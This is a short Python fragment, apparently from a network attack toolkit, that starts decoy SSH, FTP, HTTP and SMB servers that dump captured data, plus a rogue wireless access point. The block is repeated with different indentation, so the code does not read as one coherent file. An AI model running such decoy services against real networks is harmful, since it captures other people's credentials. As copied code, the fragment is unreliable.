		tmp.initialize()
		tmp.dump = True
	elif options.ftp:
		util.Msg('Starting FTP server...')
		tmp = ftp() 
		tmp.initialize()
		tmp.dump = True
	elif options.http:
		util.Msg('Starting HTTP server...')
		tmp = http()
		tmp.initialize()
		tmp.dump = True
	elif options.smb:
		util.Msg('Starting SMB listener...')
		tmp = smb()
		tmp.initialize()
		tmp.dump = True
	elif options.wap:
		util.Msg('Starting wireless access point...')
		tmp = access_point()
		tmp.initialize()
	elif options.update:
		update()
	sys.exit(1)
        scan = ap_scan()
        if options.channel: scan.channel = options.channel
        scan.initialize()
    elif options.ssh:
        util.Msg('Starting SSH server...')
        tmp = ssh()
        tmp.initialize()
        tmp.dump = True
    elif options.ftp:
        util.Msg('Starting FTP server...')
        tmp = ftp()
        tmp.initialize()
        tmp.dump = True
    elif options.http:
        util.Msg('Starting HTTP server...')
        tmp = http()
        tmp.initialize()
        tmp.dump = True
    elif options.smb:
        util.Msg('Starting SMB listener...')
        tmp = smb()
        tmp.initialize()
        tmp.dump = True
    elif options.wap:
        util.Msg('Starting wireless access point...')
        tmp = access_point()
        tmp.initialize()
    elif options.update:
        update()
    sys.exit(1)